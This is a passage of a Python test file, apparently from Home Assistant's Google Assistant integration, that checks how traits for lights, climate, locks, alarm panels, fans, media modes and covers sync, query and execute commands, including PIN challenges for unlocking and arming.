            {"color": {"temperature": 5555}},
            {},
        )
    assert err.value.code == const.ERR_VALUE_OUT_OF_RANGE
    # An in-range temperature is converted back to mireds for the service call.
    await trt.execute(
        trait.COMMAND_COLOR_ABSOLUTE, BASIC_DATA, {"color": {"temperature": 2857}}, {}
    )
    assert len(calls) == 1
    assert calls[0].data == {
        ATTR_ENTITY_ID: "light.bla",
        light.ATTR_COLOR_TEMP: color.color_temperature_kelvin_to_mired(2857),
    }
async def test_color_light_temperature_light_bad_temp(hass):
    """Test ColorTemperature trait when the light reports a zero color temp."""
    assert helpers.get_google_type(light.DOMAIN, None) is not None
    assert not trait.ColorSettingTrait.supported(light.DOMAIN, 0, None)
    assert trait.ColorSettingTrait.supported(
        light.DOMAIN, light.SUPPORT_COLOR_TEMP, None
    )
    trt = trait.ColorSettingTrait(
        hass,
        State(
            "light.bla",
            STATE_ON,
            {
                light.ATTR_MIN_MIREDS: 200,
                # A color temperature of 0 mireds is not convertible to Kelvin.
                light.ATTR_COLOR_TEMP: 0,
                light.ATTR_MAX_MIREDS: 500,
            },
        ),
        BASIC_CONFIG,
    )
    # With an unusable color temperature, no color attributes are reported.
    assert trt.query_attributes() == {}
async def test_scene_scene(hass):
    """Test Scene trait support for scene domain."""
    assert helpers.get_google_type(scene.DOMAIN, None) is not None
    assert trait.SceneTrait.supported(scene.DOMAIN, 0, None)
    # The Scene trait exposes no attributes in either direction.
    scene_trait = trait.SceneTrait(hass, State("scene.bla", scene.STATE), BASIC_CONFIG)
    assert scene_trait.sync_attributes() == {}
    assert scene_trait.query_attributes() == {}
    assert scene_trait.can_execute(trait.COMMAND_ACTIVATE_SCENE, {})
    # Activating the scene turns the scene entity on.
    activate_calls = async_mock_service(hass, scene.DOMAIN, SERVICE_TURN_ON)
    await scene_trait.execute(trait.COMMAND_ACTIVATE_SCENE, BASIC_DATA, {}, {})
    assert len(activate_calls) == 1
    assert activate_calls[0].data == {ATTR_ENTITY_ID: "scene.bla"}
async def test_scene_script(hass):
    """Test Scene trait support for script domain."""
    assert helpers.get_google_type(script.DOMAIN, None) is not None
    assert trait.SceneTrait.supported(script.DOMAIN, 0, None)
    # The Scene trait exposes no attributes in either direction.
    script_trait = trait.SceneTrait(hass, State("script.bla", STATE_OFF), BASIC_CONFIG)
    assert script_trait.sync_attributes() == {}
    assert script_trait.query_attributes() == {}
    assert script_trait.can_execute(trait.COMMAND_ACTIVATE_SCENE, {})
    # Activating the scene turns the script entity on.
    activate_calls = async_mock_service(hass, script.DOMAIN, SERVICE_TURN_ON)
    await script_trait.execute(trait.COMMAND_ACTIVATE_SCENE, BASIC_DATA, {}, {})
    # We don't wait till script execution is done.
    await hass.async_block_till_done()
    assert len(activate_calls) == 1
    assert activate_calls[0].data == {ATTR_ENTITY_ID: "script.bla"}
async def test_temperature_setting_climate_onoff(hass):
    """Test TemperatureSetting trait support for climate domain - on/off."""
    assert helpers.get_google_type(climate.DOMAIN, None) is not None
    assert trait.TemperatureSettingTrait.supported(climate.DOMAIN, 0, None)
    hass.config.units.temperature_unit = TEMP_FAHRENHEIT
    trt = trait.TemperatureSettingTrait(
        hass,
        State(
            "climate.bla",
            climate.HVAC_MODE_AUTO,
            {
                ATTR_SUPPORTED_FEATURES: climate.SUPPORT_TARGET_TEMPERATURE_RANGE,
                climate.ATTR_HVAC_MODES: [
                    climate.HVAC_MODE_OFF,
                    climate.HVAC_MODE_COOL,
                    climate.HVAC_MODE_HEAT,
                    climate.HVAC_MODE_HEAT_COOL,
                ],
                climate.ATTR_MIN_TEMP: None,
                climate.ATTR_MAX_TEMP: None,
            },
        ),
        BASIC_CONFIG,
    )
    # heat_cool is exposed as Google's "heatcool"; "on" is appended.
    assert trt.sync_attributes() == {
        "availableThermostatModes": "off,cool,heat,heatcool,on",
        "thermostatTemperatureUnit": "F",
    }
    assert trt.can_execute(trait.COMMAND_THERMOSTAT_SET_MODE, {})
    # Mode "on" dispatches the generic turn_on service...
    calls = async_mock_service(hass, climate.DOMAIN, SERVICE_TURN_ON)
    await trt.execute(
        trait.COMMAND_THERMOSTAT_SET_MODE, BASIC_DATA, {"thermostatMode": "on"}, {}
    )
    assert len(calls) == 1
    # ...and mode "off" dispatches turn_off.
    calls = async_mock_service(hass, climate.DOMAIN, SERVICE_TURN_OFF)
    await trt.execute(
        trait.COMMAND_THERMOSTAT_SET_MODE, BASIC_DATA, {"thermostatMode": "off"}, {}
    )
    assert len(calls) == 1
async def test_temperature_setting_climate_range(hass):
    """Test TemperatureSetting trait support for climate domain - range."""
    assert helpers.get_google_type(climate.DOMAIN, None) is not None
    assert trait.TemperatureSettingTrait.supported(climate.DOMAIN, 0, None)
    hass.config.units.temperature_unit = TEMP_FAHRENHEIT
    trt = trait.TemperatureSettingTrait(
        hass,
        State(
            "climate.bla",
            climate.HVAC_MODE_AUTO,
            {
                climate.ATTR_CURRENT_TEMPERATURE: 70,
                climate.ATTR_CURRENT_HUMIDITY: 25,
                ATTR_SUPPORTED_FEATURES: climate.SUPPORT_TARGET_TEMPERATURE_RANGE,
                climate.ATTR_HVAC_MODES: [
                    STATE_OFF,
                    climate.HVAC_MODE_COOL,
                    climate.HVAC_MODE_HEAT,
                    climate.HVAC_MODE_AUTO,
                ],
                climate.ATTR_TARGET_TEMP_HIGH: 75,
                climate.ATTR_TARGET_TEMP_LOW: 65,
                climate.ATTR_MIN_TEMP: 50,
                climate.ATTR_MAX_TEMP: 80,
            },
        ),
        BASIC_CONFIG,
    )
    assert trt.sync_attributes() == {
        "availableThermostatModes": "off,cool,heat,auto,on",
        "thermostatTemperatureUnit": "F",
    }
    # Although the unit is Fahrenheit, Google queries receive Celsius:
    # 70F -> 21.1C ambient, 65F -> 18.3C low, 75F -> 23.9C high.
    assert trt.query_attributes() == {
        "thermostatMode": "auto",
        "thermostatTemperatureAmbient": 21.1,
        "thermostatHumidityAmbient": 25,
        "thermostatTemperatureSetpointLow": 18.3,
        "thermostatTemperatureSetpointHigh": 23.9,
    }
    assert trt.can_execute(trait.COMMAND_THERMOSTAT_TEMPERATURE_SET_RANGE, {})
    assert trt.can_execute(trait.COMMAND_THERMOSTAT_SET_MODE, {})
    calls = async_mock_service(hass, climate.DOMAIN, climate.SERVICE_SET_TEMPERATURE)
    # Setpoints arrive in Celsius and are converted back to Fahrenheit
    # for the service call (25C -> 77F, 20C -> 68F).
    await trt.execute(
        trait.COMMAND_THERMOSTAT_TEMPERATURE_SET_RANGE,
        BASIC_DATA,
        {
            "thermostatTemperatureSetpointHigh": 25,
            "thermostatTemperatureSetpointLow": 20,
        },
        {},
    )
    assert len(calls) == 1
    assert calls[0].data == {
        ATTR_ENTITY_ID: "climate.bla",
        climate.ATTR_TARGET_TEMP_HIGH: 77,
        climate.ATTR_TARGET_TEMP_LOW: 68,
    }
    calls = async_mock_service(hass, climate.DOMAIN, climate.SERVICE_SET_HVAC_MODE)
    await trt.execute(
        trait.COMMAND_THERMOSTAT_SET_MODE, BASIC_DATA, {"thermostatMode": "cool"}, {}
    )
    assert len(calls) == 1
    assert calls[0].data == {
        ATTR_ENTITY_ID: "climate.bla",
        climate.ATTR_HVAC_MODE: climate.HVAC_MODE_COOL,
    }
    # A setpoint far outside the min/max range is rejected.
    with pytest.raises(helpers.SmartHomeError) as err:
        await trt.execute(
            trait.COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT,
            BASIC_DATA,
            {"thermostatTemperatureSetpoint": -100},
            {},
        )
    assert err.value.code == const.ERR_VALUE_OUT_OF_RANGE
    # Restore the default unit for subsequent tests.
    hass.config.units.temperature_unit = TEMP_CELSIUS
async def test_temperature_setting_climate_setpoint(hass):
    """Test TemperatureSetting trait support for climate domain - setpoint."""
    assert helpers.get_google_type(climate.DOMAIN, None) is not None
    assert trait.TemperatureSettingTrait.supported(climate.DOMAIN, 0, None)
    hass.config.units.temperature_unit = TEMP_CELSIUS
    # Climate entity in COOL mode with a single target temperature (18 C).
    trt = trait.TemperatureSettingTrait(
        hass,
        State(
            "climate.bla",
            climate.HVAC_MODE_COOL,
            {
                climate.ATTR_HVAC_MODES: [STATE_OFF, climate.HVAC_MODE_COOL],
                climate.ATTR_MIN_TEMP: 10,
                climate.ATTR_MAX_TEMP: 30,
                ATTR_TEMPERATURE: 18,
                climate.ATTR_CURRENT_TEMPERATURE: 20,
            },
        ),
        BASIC_CONFIG,
    )
    assert trt.sync_attributes() == {
        "availableThermostatModes": "off,cool,on",
        "thermostatTemperatureUnit": "C",
    }
    assert trt.query_attributes() == {
        "thermostatMode": "cool",
        "thermostatTemperatureAmbient": 20,
        "thermostatTemperatureSetpoint": 18,
    }
    assert trt.can_execute(trait.COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT, {})
    assert trt.can_execute(trait.COMMAND_THERMOSTAT_SET_MODE, {})
    calls = async_mock_service(hass, climate.DOMAIN, climate.SERVICE_SET_TEMPERATURE)
    # A setpoint far below ATTR_MIN_TEMP must be rejected and must not
    # reach the set_temperature service (calls stays empty).
    with pytest.raises(helpers.SmartHomeError):
        await trt.execute(
            trait.COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT,
            BASIC_DATA,
            {"thermostatTemperatureSetpoint": -100},
            {},
        )
    # An in-range setpoint is forwarded to climate.set_temperature as-is
    # (unit already Celsius, so no conversion).
    await trt.execute(
        trait.COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT,
        BASIC_DATA,
        {"thermostatTemperatureSetpoint": 19},
        {},
    )
    assert len(calls) == 1
    assert calls[0].data == {ATTR_ENTITY_ID: "climate.bla", ATTR_TEMPERATURE: 19}
async def test_temperature_setting_climate_setpoint_auto(hass):
    """
    Test TemperatureSetting trait support for climate domain.

    Setpoint in auto mode.
    """
    hass.config.units.temperature_unit = TEMP_CELSIUS
    # A heat/cool entity exposes its single target temperature as both the
    # Google low and high setpoints.
    state = State(
        "climate.bla",
        climate.HVAC_MODE_HEAT_COOL,
        {
            climate.ATTR_HVAC_MODES: [
                climate.HVAC_MODE_OFF,
                climate.HVAC_MODE_HEAT_COOL,
            ],
            climate.ATTR_MIN_TEMP: 10,
            climate.ATTR_MAX_TEMP: 30,
            ATTR_TEMPERATURE: 18,
            climate.ATTR_CURRENT_TEMPERATURE: 20,
        },
    )
    trt = trait.TemperatureSettingTrait(hass, state, BASIC_CONFIG)
    expected_sync = {
        "availableThermostatModes": "off,heatcool,on",
        "thermostatTemperatureUnit": "C",
    }
    assert trt.sync_attributes() == expected_sync
    expected_query = {
        "thermostatMode": "heatcool",
        "thermostatTemperatureAmbient": 20,
        "thermostatTemperatureSetpointHigh": 18,
        "thermostatTemperatureSetpointLow": 18,
    }
    assert trt.query_attributes() == expected_query
    for command in (
        trait.COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT,
        trait.COMMAND_THERMOSTAT_SET_MODE,
    ):
        assert trt.can_execute(command, {})
    calls = async_mock_service(hass, climate.DOMAIN, climate.SERVICE_SET_TEMPERATURE)
    await trt.execute(
        trait.COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT,
        BASIC_DATA,
        {"thermostatTemperatureSetpoint": 19},
        {},
    )
    assert len(calls) == 1
    assert calls[0].data == {ATTR_ENTITY_ID: "climate.bla", ATTR_TEMPERATURE: 19}
async def test_lock_unlock_lock(hass):
    """Test LockUnlock trait locking support for lock domain."""
    assert helpers.get_google_type(lock.DOMAIN, None) is not None
    assert trait.LockUnlockTrait.supported(lock.DOMAIN, lock.SUPPORT_OPEN, None)
    assert trait.LockUnlockTrait.might_2fa(lock.DOMAIN, lock.SUPPORT_OPEN, None)
    locked_state = State("lock.front_door", lock.STATE_LOCKED)
    trt = trait.LockUnlockTrait(hass, locked_state, PIN_CONFIG)
    assert trt.sync_attributes() == {}
    assert trt.query_attributes() == {"isLocked": True}
    assert trt.can_execute(trait.COMMAND_LOCKUNLOCK, {"lock": True})
    # Locking is not security sensitive, so no PIN challenge is required.
    calls = async_mock_service(hass, lock.DOMAIN, lock.SERVICE_LOCK)
    await trt.execute(trait.COMMAND_LOCKUNLOCK, PIN_DATA, {"lock": True}, {})
    assert len(calls) == 1
    assert calls[0].data == {ATTR_ENTITY_ID: "lock.front_door"}
async def test_lock_unlock_unlock(hass):
    """Test LockUnlock trait unlocking support for lock domain."""
    assert helpers.get_google_type(lock.DOMAIN, None) is not None
    assert trait.LockUnlockTrait.supported(lock.DOMAIN, lock.SUPPORT_OPEN, None)
    trt = trait.LockUnlockTrait(
        hass, State("lock.front_door", lock.STATE_LOCKED), PIN_CONFIG
    )
    assert trt.sync_attributes() == {}
    assert trt.query_attributes() == {"isLocked": True}
    assert trt.can_execute(trait.COMMAND_LOCKUNLOCK, {"lock": False})
    calls = async_mock_service(hass, lock.DOMAIN, lock.SERVICE_UNLOCK)
    # No challenge data -> a PIN challenge is raised and no service call is made.
    with pytest.raises(error.ChallengeNeeded) as err:
        await trt.execute(trait.COMMAND_LOCKUNLOCK, PIN_DATA, {"lock": False}, {})
    assert len(calls) == 0
    assert err.value.code == const.ERR_CHALLENGE_NEEDED
    assert err.value.challenge_type == const.CHALLENGE_PIN_NEEDED
    # invalid pin -> challenge raised again with the "failed pin" type.
    with pytest.raises(error.ChallengeNeeded) as err:
        await trt.execute(
            trait.COMMAND_LOCKUNLOCK, PIN_DATA, {"lock": False}, {"pin": 9999}
        )
    assert len(calls) == 0
    assert err.value.code == const.ERR_CHALLENGE_NEEDED
    assert err.value.challenge_type == const.CHALLENGE_FAILED_PIN_NEEDED
    # Correct pin -> unlock service is finally invoked once.
    await trt.execute(
        trait.COMMAND_LOCKUNLOCK, PIN_DATA, {"lock": False}, {"pin": "1234"}
    )
    assert len(calls) == 1
    assert calls[0].data == {ATTR_ENTITY_ID: "lock.front_door"}
    # Test without pin: a config lacking a secure PIN cannot run the challenge
    # flow at all, so the command errors with "challenge not set up".
    trt = trait.LockUnlockTrait(
        hass, State("lock.front_door", lock.STATE_LOCKED), BASIC_CONFIG
    )
    with pytest.raises(error.SmartHomeError) as err:
        await trt.execute(trait.COMMAND_LOCKUNLOCK, BASIC_DATA, {"lock": False}, {})
    assert len(calls) == 1
    assert err.value.code == const.ERR_CHALLENGE_NOT_SETUP
    # Test with 2FA override: when should_2fa returns False the unlock goes
    # straight through without any challenge.
    with patch(
        "homeassistant.components.google_assistant.helpers"
        ".AbstractConfig.should_2fa",
        return_value=False,
    ):
        await trt.execute(trait.COMMAND_LOCKUNLOCK, BASIC_DATA, {"lock": False}, {})
    assert len(calls) == 2
async def test_arm_disarm_arm_away(hass):
    """Test ArmDisarm trait Arming support for alarm_control_panel domain."""
    assert helpers.get_google_type(alarm_control_panel.DOMAIN, None) is not None
    assert trait.ArmDisArmTrait.supported(alarm_control_panel.DOMAIN, 0, None)
    # Arming can require 2FA (PIN) confirmation.
    assert trait.ArmDisArmTrait.might_2fa(alarm_control_panel.DOMAIN, 0, None)
    trt = trait.ArmDisArmTrait(
        hass,
        State(
            "alarm_control_panel.alarm",
            STATE_ALARM_ARMED_AWAY,
            {alarm_control_panel.ATTR_CODE_ARM_REQUIRED: True},
        ),
        PIN_CONFIG,
    )
    # Sync advertises every arm level with its English synonyms; the levels
    # are explicitly unordered.
    assert trt.sync_attributes() == {
        "availableArmLevels": {
            "levels": [
                {
                    "level_name": "armed_home",
                    "level_values": [
                        {"level_synonym": ["armed home", "home"], "lang": "en"}
                    ],
                },
                {
                    "level_name": "armed_away",
                    "level_values": [
                        {"level_synonym": ["armed away", "away"], "lang": "en"}
                    ],
                },
                {
                    "level_name": "armed_night",
                    "level_values": [
                        {"level_synonym": ["armed night", "night"], "lang": "en"}
                    ],
                },
                {
                    "level_name": "armed_custom_bypass",
                    "level_values": [
                        {
                            "level_synonym": ["armed custom bypass", "custom"],
                            "lang": "en",
                        }
                    ],
                },
                {
                    "level_name": "triggered",
                    "level_values": [{"level_synonym": ["triggered"], "lang": "en"}],
                },
            ],
            "ordered": False,
        }
    }
    assert trt.query_attributes() == {
        "isArmed": True,
        "currentArmLevel": STATE_ALARM_ARMED_AWAY,
    }
    assert trt.can_execute(
        trait.COMMAND_ARMDISARM, {"arm": True, "armLevel": STATE_ALARM_ARMED_AWAY}
    )
    calls = async_mock_service(
        hass, alarm_control_panel.DOMAIN, alarm_control_panel.SERVICE_ALARM_ARM_AWAY
    )
    # Test with no secure_pin configured: arming fails before any service call.
    with pytest.raises(error.SmartHomeError) as err:
        trt = trait.ArmDisArmTrait(
            hass,
            State(
                "alarm_control_panel.alarm",
                STATE_ALARM_DISARMED,
                {alarm_control_panel.ATTR_CODE_ARM_REQUIRED: True},
            ),
            BASIC_CONFIG,
        )
        await trt.execute(
            trait.COMMAND_ARMDISARM,
            BASIC_DATA,
            {"arm": True, "armLevel": STATE_ALARM_ARMED_AWAY},
            {},
        )
    assert len(calls) == 0
    assert err.value.code == const.ERR_CHALLENGE_NOT_SETUP
    trt = trait.ArmDisArmTrait(
        hass,
        State(
            "alarm_control_panel.alarm",
            STATE_ALARM_DISARMED,
            {alarm_control_panel.ATTR_CODE_ARM_REQUIRED: True},
        ),
        PIN_CONFIG,
    )
    # No challenge data -> PIN challenge raised, no service call.
    with pytest.raises(error.ChallengeNeeded) as err:
        await trt.execute(
            trait.COMMAND_ARMDISARM,
            PIN_DATA,
            {"arm": True, "armLevel": STATE_ALARM_ARMED_AWAY},
            {},
        )
    assert len(calls) == 0
    assert err.value.code == const.ERR_CHALLENGE_NEEDED
    assert err.value.challenge_type == const.CHALLENGE_PIN_NEEDED
    # invalid pin -> challenge raised again as a failed PIN.
    with pytest.raises(error.ChallengeNeeded) as err:
        await trt.execute(
            trait.COMMAND_ARMDISARM,
            PIN_DATA,
            {"arm": True, "armLevel": STATE_ALARM_ARMED_AWAY},
            {"pin": 9999},
        )
    assert len(calls) == 0
    assert err.value.code == const.ERR_CHALLENGE_NEEDED
    assert err.value.challenge_type == const.CHALLENGE_FAILED_PIN_NEEDED
    # correct pin -> arm_away service is called once.
    await trt.execute(
        trait.COMMAND_ARMDISARM,
        PIN_DATA,
        {"arm": True, "armLevel": STATE_ALARM_ARMED_AWAY},
        {"pin": "1234"},
    )
    assert len(calls) == 1
    # Test already armed: re-arming to the current level is an error and does
    # not add a service call (count stays at 1).
    with pytest.raises(error.SmartHomeError) as err:
        trt = trait.ArmDisArmTrait(
            hass,
            State(
                "alarm_control_panel.alarm",
                STATE_ALARM_ARMED_AWAY,
                {alarm_control_panel.ATTR_CODE_ARM_REQUIRED: True},
            ),
            PIN_CONFIG,
        )
        await trt.execute(
            trait.COMMAND_ARMDISARM,
            PIN_DATA,
            {"arm": True, "armLevel": STATE_ALARM_ARMED_AWAY},
            {},
        )
    assert len(calls) == 1
    assert err.value.code == const.ERR_ALREADY_ARMED
    # Test with code_arm_required False: no PIN challenge needed, the service
    # is called directly (count goes to 2).
    trt = trait.ArmDisArmTrait(
        hass,
        State(
            "alarm_control_panel.alarm",
            STATE_ALARM_DISARMED,
            {alarm_control_panel.ATTR_CODE_ARM_REQUIRED: False},
        ),
        PIN_CONFIG,
    )
    await trt.execute(
        trait.COMMAND_ARMDISARM,
        PIN_DATA,
        {"arm": True, "armLevel": STATE_ALARM_ARMED_AWAY},
        {},
    )
    assert len(calls) == 2
async def test_arm_disarm_disarm(hass):
    """Test ArmDisarm trait Disarming support for alarm_control_panel domain."""
    assert helpers.get_google_type(alarm_control_panel.DOMAIN, None) is not None
    assert trait.ArmDisArmTrait.supported(alarm_control_panel.DOMAIN, 0, None)
    # Disarming can require 2FA (PIN) confirmation.
    assert trait.ArmDisArmTrait.might_2fa(alarm_control_panel.DOMAIN, 0, None)
    trt = trait.ArmDisArmTrait(
        hass,
        State(
            "alarm_control_panel.alarm",
            STATE_ALARM_DISARMED,
            {alarm_control_panel.ATTR_CODE_ARM_REQUIRED: True},
        ),
        PIN_CONFIG,
    )
    # Sync payload is identical to the arming test: all arm levels with
    # English synonyms, unordered.
    assert trt.sync_attributes() == {
        "availableArmLevels": {
            "levels": [
                {
                    "level_name": "armed_home",
                    "level_values": [
                        {"level_synonym": ["armed home", "home"], "lang": "en"}
                    ],
                },
                {
                    "level_name": "armed_away",
                    "level_values": [
                        {"level_synonym": ["armed away", "away"], "lang": "en"}
                    ],
                },
                {
                    "level_name": "armed_night",
                    "level_values": [
                        {"level_synonym": ["armed night", "night"], "lang": "en"}
                    ],
                },
                {
                    "level_name": "armed_custom_bypass",
                    "level_values": [
                        {
                            "level_synonym": ["armed custom bypass", "custom"],
                            "lang": "en",
                        }
                    ],
                },
                {
                    "level_name": "triggered",
                    "level_values": [{"level_synonym": ["triggered"], "lang": "en"}],
                },
            ],
            "ordered": False,
        }
    }
    assert trt.query_attributes() == {"isArmed": False}
    assert trt.can_execute(trait.COMMAND_ARMDISARM, {"arm": False})
    calls = async_mock_service(
        hass, alarm_control_panel.DOMAIN, alarm_control_panel.SERVICE_ALARM_DISARM
    )
    # Test without secure_pin configured: disarm fails, no service call.
    with pytest.raises(error.SmartHomeError) as err:
        trt = trait.ArmDisArmTrait(
            hass,
            State(
                "alarm_control_panel.alarm",
                STATE_ALARM_ARMED_AWAY,
                {alarm_control_panel.ATTR_CODE_ARM_REQUIRED: True},
            ),
            BASIC_CONFIG,
        )
        await trt.execute(trait.COMMAND_ARMDISARM, BASIC_DATA, {"arm": False}, {})
    assert len(calls) == 0
    assert err.value.code == const.ERR_CHALLENGE_NOT_SETUP
    trt = trait.ArmDisArmTrait(
        hass,
        State(
            "alarm_control_panel.alarm",
            STATE_ALARM_ARMED_AWAY,
            {alarm_control_panel.ATTR_CODE_ARM_REQUIRED: True},
        ),
        PIN_CONFIG,
    )
    # No challenge data -> PIN challenge raised, no service call.
    with pytest.raises(error.ChallengeNeeded) as err:
        await trt.execute(trait.COMMAND_ARMDISARM, PIN_DATA, {"arm": False}, {})
    assert len(calls) == 0
    assert err.value.code == const.ERR_CHALLENGE_NEEDED
    assert err.value.challenge_type == const.CHALLENGE_PIN_NEEDED
    # invalid pin -> failed-PIN challenge raised.
    with pytest.raises(error.ChallengeNeeded) as err:
        await trt.execute(
            trait.COMMAND_ARMDISARM, PIN_DATA, {"arm": False}, {"pin": 9999}
        )
    assert len(calls) == 0
    assert err.value.code == const.ERR_CHALLENGE_NEEDED
    assert err.value.challenge_type == const.CHALLENGE_FAILED_PIN_NEEDED
    # correct pin -> disarm service called once.
    await trt.execute(
        trait.COMMAND_ARMDISARM, PIN_DATA, {"arm": False}, {"pin": "1234"}
    )
    assert len(calls) == 1
    # Test already disarmed: disarming again errors without another call.
    with pytest.raises(error.SmartHomeError) as err:
        trt = trait.ArmDisArmTrait(
            hass,
            State(
                "alarm_control_panel.alarm",
                STATE_ALARM_DISARMED,
                {alarm_control_panel.ATTR_CODE_ARM_REQUIRED: True},
            ),
            PIN_CONFIG,
        )
        await trt.execute(trait.COMMAND_ARMDISARM, PIN_DATA, {"arm": False}, {})
    assert len(calls) == 1
    assert err.value.code == const.ERR_ALREADY_DISARMED
    # Cancel arming after already armed will require pin: cancelling from an
    # armed state is treated as a disarm and still needs the challenge.
    with pytest.raises(error.SmartHomeError) as err:
        trt = trait.ArmDisArmTrait(
            hass,
            State(
                "alarm_control_panel.alarm",
                STATE_ALARM_ARMED_AWAY,
                {alarm_control_panel.ATTR_CODE_ARM_REQUIRED: False},
            ),
            PIN_CONFIG,
        )
        await trt.execute(
            trait.COMMAND_ARMDISARM, PIN_DATA, {"arm": True, "cancel": True}, {}
        )
    assert len(calls) == 1
    assert err.value.code == const.ERR_CHALLENGE_NEEDED
    assert err.value.challenge_type == const.CHALLENGE_PIN_NEEDED
    # Cancel arming while pending to arm doesn't require pin.
    trt = trait.ArmDisArmTrait(
        hass,
        State(
            "alarm_control_panel.alarm",
            STATE_ALARM_PENDING,
            {alarm_control_panel.ATTR_CODE_ARM_REQUIRED: False},
        ),
        PIN_CONFIG,
    )
    await trt.execute(
        trait.COMMAND_ARMDISARM, PIN_DATA, {"arm": True, "cancel": True}, {}
    )
    assert len(calls) == 2
async def test_fan_speed(hass):
    """Test FanSpeed trait speed control support for fan domain."""
    assert helpers.get_google_type(fan.DOMAIN, None) is not None
    assert trait.FanSpeedTrait.supported(fan.DOMAIN, fan.SUPPORT_SET_SPEED, None)
    # Fan reporting "high" as its state but "low" as the current speed
    # attribute; query must reflect the attribute, not the state.
    trt = trait.FanSpeedTrait(
        hass,
        State(
            "fan.living_room_fan",
            fan.SPEED_HIGH,
            attributes={
                "speed_list": [
                    fan.SPEED_OFF,
                    fan.SPEED_LOW,
                    fan.SPEED_MEDIUM,
                    fan.SPEED_HIGH,
                ],
                "speed": "low",
            },
        ),
        BASIC_CONFIG,
    )
    # Sync exposes the ordered speed ladder with English synonyms per speed.
    assert trt.sync_attributes() == {
        "availableFanSpeeds": {
            "ordered": True,
            "speeds": [
                {
                    "speed_name": "off",
                    "speed_values": [{"speed_synonym": ["stop", "off"], "lang": "en"}],
                },
                {
                    "speed_name": "low",
                    "speed_values": [
                        {
                            "speed_synonym": ["slow", "low", "slowest", "lowest"],
                            "lang": "en",
                        }
                    ],
                },
                {
                    "speed_name": "medium",
                    "speed_values": [
                        {"speed_synonym": ["medium", "mid", "middle"], "lang": "en"}
                    ],
                },
                {
                    "speed_name": "high",
                    "speed_values": [
                        {
                            "speed_synonym": [
                                "high",
                                "max",
                                "fast",
                                "highest",
                                "fastest",
                                "maximum",
                            ],
                            "lang": "en",
                        }
                    ],
                },
            ],
        },
        "reversible": False,
    }
    assert trt.query_attributes() == {
        "currentFanSpeedSetting": "low",
        "on": True,
        "online": True,
    }
    assert trt.can_execute(trait.COMMAND_FANSPEED, params={"fanSpeed": "medium"})
    # Executing SetFanSpeed forwards the requested speed to fan.set_speed.
    calls = async_mock_service(hass, fan.DOMAIN, fan.SERVICE_SET_SPEED)
    await trt.execute(trait.COMMAND_FANSPEED, BASIC_DATA, {"fanSpeed": "medium"}, {})
    assert len(calls) == 1
    assert calls[0].data == {"entity_id": "fan.living_room_fan", "speed": "medium"}
async def test_modes(hass):
    """Test Mode trait."""
    assert helpers.get_google_type(media_player.DOMAIN, None) is not None
    assert trait.ModesTrait.supported(
        media_player.DOMAIN, media_player.SUPPORT_SELECT_SOURCE, None
    )
    # Media player with four sources; only the recognized ones ("media",
    # "game", "chromecast") appear in the synced settings below.
    trt = trait.ModesTrait(
        hass,
        State(
            "media_player.living_room",
            media_player.STATE_PLAYING,
            attributes={
                media_player.ATTR_INPUT_SOURCE_LIST: [
                    "media",
                    "game",
                    "chromecast",
                    "plex",
                ],
                media_player.ATTR_INPUT_SOURCE: "game",
            },
        ),
        BASIC_CONFIG,
    )
    attribs = trt.sync_attributes()
    assert attribs == {
        "availableModes": [
            {
                "name": "input source",
                "name_values": [{"name_synonym": ["input source"], "lang": "en"}],
                "settings": [
                    {
                        "setting_name": "media",
                        "setting_values": [
                            {"setting_synonym": ["media", "media mode"], "lang": "en"}
                        ],
                    },
                    {
                        "setting_name": "game",
                        "setting_values": [
                            {"setting_synonym": ["game", "game mode"], "lang": "en"}
                        ],
                    },
                    {
                        "setting_name": "chromecast",
                        "setting_values": [
                            {"setting_synonym": ["chromecast"], "lang": "en"}
                        ],
                    },
                ],
                "ordered": False,
            }
        ]
    }
    assert trt.query_attributes() == {
        "currentModeSettings": {"source": "game"},
        "on": True,
        "online": True,
    }
    # HA_TO_GOOGLE maps the HA attribute name to the Google mode name used
    # in the command payload.
    assert trt.can_execute(
        trait.COMMAND_MODES,
        params={
            "updateModeSettings": {
                trt.HA_TO_GOOGLE.get(media_player.ATTR_INPUT_SOURCE): "media"
            }
        },
    )
    calls = async_mock_service(
        hass, media_player.DOMAIN, media_player.SERVICE_SELECT_SOURCE
    )
    await trt.execute(
        trait.COMMAND_MODES,
        BASIC_DATA,
        {
            "updateModeSettings": {
                trt.HA_TO_GOOGLE.get(media_player.ATTR_INPUT_SOURCE): "media"
            }
        },
        {},
    )
    assert len(calls) == 1
    assert calls[0].data == {"entity_id": "media_player.living_room", "source": "media"}
async def test_openclose_cover(hass):
    """Test OpenClose trait support for cover domain."""
    assert helpers.get_google_type(cover.DOMAIN, None) is not None
    assert trait.OpenCloseTrait.supported(
        cover.DOMAIN, cover.SUPPORT_SET_POSITION, None
    )
    # Cover at 75% open that supports positioned moves.
    cover_state = State(
        "cover.bla",
        cover.STATE_OPEN,
        {
            cover.ATTR_CURRENT_POSITION: 75,
            ATTR_SUPPORTED_FEATURES: cover.SUPPORT_SET_POSITION,
        },
    )
    trt = trait.OpenCloseTrait(hass, cover_state, BASIC_CONFIG)
    assert trt.sync_attributes() == {}
    assert trt.query_attributes() == {"openPercent": 75}
    calls = async_mock_service(hass, cover.DOMAIN, cover.SERVICE_SET_COVER_POSITION)
    await trt.execute(trait.COMMAND_OPENCLOSE, BASIC_DATA, {"openPercent": 50}, {})
    assert len(calls) == 1
    assert calls[0].data == {ATTR_ENTITY_ID: "cover.bla", cover.ATTR_POSITION: 50}
async def test_openclose_cover_unknown_state(hass):
    """Test OpenClose trait support for cover domain with unknown state."""
    assert helpers.get_google_type(cover.DOMAIN, None) is not None
    assert trait.OpenCloseTrait.supported(
        cover.DOMAIN, cover.SUPPORT_SET_POSITION, None
    )
    # No state: querying before any command must raise.
    unknown = State("cover.bla", STATE_UNKNOWN, {})
    trt = trait.OpenCloseTrait(hass, unknown, BASIC_CONFIG)
    assert trt.sync_attributes() == {}
    with pytest.raises(helpers.SmartHomeError):
        trt.query_attributes()
    calls = async_mock_service(hass, cover.DOMAIN, cover.SERVICE_OPEN_COVER)
    await trt.execute(trait.COMMAND_OPENCLOSE, BASIC_DATA, {"openPercent": 100}, {})
    assert len(calls) == 1
    assert calls[0].data == {ATTR_ENTITY_ID: "cover.bla"}
